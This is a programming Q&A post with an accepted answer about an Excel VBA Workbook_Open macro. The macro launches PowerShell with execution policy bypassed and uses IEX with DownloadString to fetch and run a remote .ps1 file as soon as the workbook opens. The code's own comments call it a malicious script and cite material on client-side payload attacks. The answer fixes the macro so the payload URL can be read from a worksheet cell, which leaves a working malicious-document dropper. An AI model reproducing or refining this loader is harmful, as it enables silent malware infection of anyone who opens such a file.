# Set variable with URL into powershell execution

Tags: vba, excel, powershell

I am using powershell and Excel to try to download from a remote server some powershell files and then execute it in the background while doing it in VBA.

The following code works fine.

```
Sub Workbook_Open()
'https://countuponsecurity.files.wordpress.com/2014/10/feodo-docmechanics.png
'https://enigma0x3.wordpress.com/2014/01/11/using-a-powershell-payload-in-a-client-side-attack/
Dim MaURL As String
Set objFSO = CreateObject("Scripting.FileSystemObject")
Set objShell = CreateObject("Wscript.shell")
'Downloading malicious script and execution
MaURL = Worksheets("Script").Range("D15").Value
objShell.Run "powershell.exe -ExecutionPolicy Bypass -nologo -noprofile -c IEX ((New-Object Net.WebClient).DownloadString('http://mywebsite.com/hehe.ps1'))"
'vbMaximizedFocus or vbHide
End Sub
```

Now I want to change the hard written code in the VBA and read the URL from the cells in my Excel worksheets:

In D10 I have `Wscript.shell`, which works fine so far, but when I try to read from D15 where I have `http://mywebsite.com/hehe.ps1` and try to change the code above in bold, it doesn't work.

```
Sub Workbook_Open()
'https://countuponsecurity.files.wordpress.com/2014/10/feodo-docmechanics.png
'https://enigma0x3.wordpress.com/2014/01/11/using-a-powershell-payload-in-a-client-side-attack/
Dim MaURL As String
Set objFSO = CreateObject("Scripting.FileSystemObject")
Set objShell = CreateObject(Worksheets("Script").Range("D10").Value)
'Downloading malicious script and execution
MaURL = Worksheets("Script").Range("D15").Value
objShell.Run "powershell.exe -ExecutionPolicy Bypass -nologo -noprofile -c IEX ((New-Object Net.WebClient).DownloadString(**MaURL**))"
'vbMaximizedFocus or vbHide
End Sub
```

Ty in advance.

Answer (score 2, accepted):

Since `MaURL` is a variable, it shouldn't be included in the Execution String, but rather concatenated onto it.

Try changing:
`objShell.Run "powershell.exe -ExecutionPolicy Bypass -nologo -noprofile -c IEX ((New-Object Net.WebClient).DownloadString(**MaURL**))"`

to

`objShell.Run "powershell.exe -ExecutionPolicy Bypass -nologo -noprofile -c IEX ((New-Object Net.WebClient).DownloadString('" & MaURL & "'))"`